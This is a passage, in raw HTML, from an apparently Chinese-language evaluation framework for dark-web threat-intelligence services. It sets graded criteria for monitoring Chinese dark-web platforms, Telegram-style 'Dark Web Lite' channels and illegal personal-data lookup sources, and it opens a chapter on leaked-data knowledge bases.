style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文暗网 Traditional Dark Web 的识别</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">不支持专门面向中文 Traditional Dark Web 威胁源监测</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">覆盖至少 2 个主要中文 Traditional Dark Web 平台</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">深度监测并覆盖至少 5 个主要中文 Traditional Dark Web 平台</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对中文 Traditional Dark Web 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化覆盖深度，可客观反映主体在本土化暗网生态中的识别水平，为后续情报分析与风险预警提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">具备针对性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">7.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">中文 Dark Web Lite 识别</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文 Dark Web Lite 识别能力，是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文暗网生态环境威胁识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要构成指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对网络安全相关中文 Dark Web Lite 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 为当前数据泄露贩卖、勒索通告、IAB 交易及侵公查档等威胁活动的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">主要承载载体</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，其中中文相关群组与频道具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">传播速率快、迭代频次高、总体规模大</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的典型特征。若无法对该类本土化威胁源实现有效识别与全域覆盖，则难以及时发现面向中国境内主体的定向威胁活动，易形成情报覆盖盲区，进而削弱风险预警工作的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;text-indent: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对中文 Dark Web Lite 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定本土化暗网威胁场景下情报获取的有效性，可为后续威胁分析、风险预警与应急处置工作提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">具备针对性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文 Dark Web Lite</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源的实际分类特征与监测需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文 Dark Web Lite 生态内的网络安全相关威胁源主要可划分为三类：其一为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据发布与交易类</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">群组，对应境外数据泄露与窃密日志交易类频道；其二为黑灰产</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据专卖类</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">群组，涵盖电商消费数据、交通出行实时数据等境内敏感数据交易载体；其三为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公类</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数据相关群组，包含个人信息挖掘、定向查档类服务载体。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对上述类型威胁源实施有效监测具备重要价值：一方面，监测广度直接决定面向中国境内主体定向威胁活动的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时发现能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；另一方面，唯有实现三类威胁源的全面识别，方可构建完整的本土化威胁视图，消除情报覆盖盲区，为风险预警与应急处置提供可靠支撑。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以威胁源</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定科学合理的分级阈值，确保指标可客观反映主体在中文 Dark Web Lite 识别维度的实际能力水平。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文 Dark Web Lite 识别以威胁源</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文暗网 Dark Web Lite 的识别</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">不支持专门面向中文 Dark Web Lite 威胁源监测</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采集网络安全相关中文 Dark Web Lite 威胁源数量 &gt; 500</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采集网络安全相关中文 Dark Web Lite 威胁源数量 &gt; 2000</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对中文 Dark Web Lite 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化威胁源群组与频道的采集数量，可客观反映主体在本土化暗网生态中的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖广度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续情报分析、风险预警与应急处置提供重要的数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">7.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">侵公威胁源识别</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">识别是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文暗网生态环境威胁识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要专项指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对侵公、查档类本土化威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">预警能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公威胁</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">属于中文暗网生态中具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高度本土化特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的典型风险形态，核心指向通过非法渠道侵害公民个人隐私数据的相关行为。若无法对该类威胁源实现有效识别，则难以及时发现面向中国境内主体的隐私数据贩卖活动，致使相关风险长期处于隐匿状态，无法为境内主体提供具备针对性的预警与防护支撑。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对侵公、查档类威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集能力、识别能力与预警能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定本土化隐私泄露威胁的早期发现水平，可为境内主体隐私保护及合规风险管理提供关键技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的实际特征与情报价值进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">侵公类数据具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实时性强、完整性高、合法获取难度大、信息要素全面</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等显著特征，其主要来源为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">内部权限主体</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">或</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">上下游数据权限提供方</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">非法查询服务</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，少量来源于应用程序编程接口漏洞等技术层面缺陷。该类数据与传统暗网环境中发布的数据集，在</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">获取途径、持续危害程度、研判处置难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等方面存在本质差异。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">传统暗网数据集多呈现一次性泄露特征，而侵公类数据通常具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续更新、精准查询</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的能力，对公民个人隐私与机构内部信息安全构成</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期且直接</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的威胁。因此，本框架以侵公威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">预警能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估对该类本土化高风险威胁的监测水平。通过设定科学合理的分级标准，确保指标可客观反映主体在中文暗网生态环境中的专项识别能力。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">侵公威胁源识别以对侵公、查档类威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集与识别深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">侵公威胁源识别</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">不支持专门面向侵公、查档类威胁源识别</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能采集并识别较多侵公、查档类威胁源</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">深度识别并预警侵公、查档类威胁源，对附件、图像等多媒体元素进行OCR分析并提供向量检索</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对侵公、查档类威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">预警能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化识别深度与覆盖范围，可客观反映主体在本土化隐私泄露威胁监测中的实际水平，为境内主体隐私保护及合规风险管理提供关键技术支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第八章 </span></span></strong></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">海量泄露数据知识库能力</span></span></strong></span></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">海量泄露数据知识库是暗网情报体系中</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据资产汇聚、价值提炼、长期复用</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的核心支撑载体，承载全域历史泄露数据与新增泄露数据的标准化治理、规模化存储、智能化检索功能。该知识库以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高保真、去重化、结构化、安全化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为建设准则，面向全域数据泄露事件提供全周期数据支撑，是实现威胁溯源、风险预警、事件核验、态势分析的关键基础。本章立足海量数据的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">治理难度、响应速度、扩展能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span 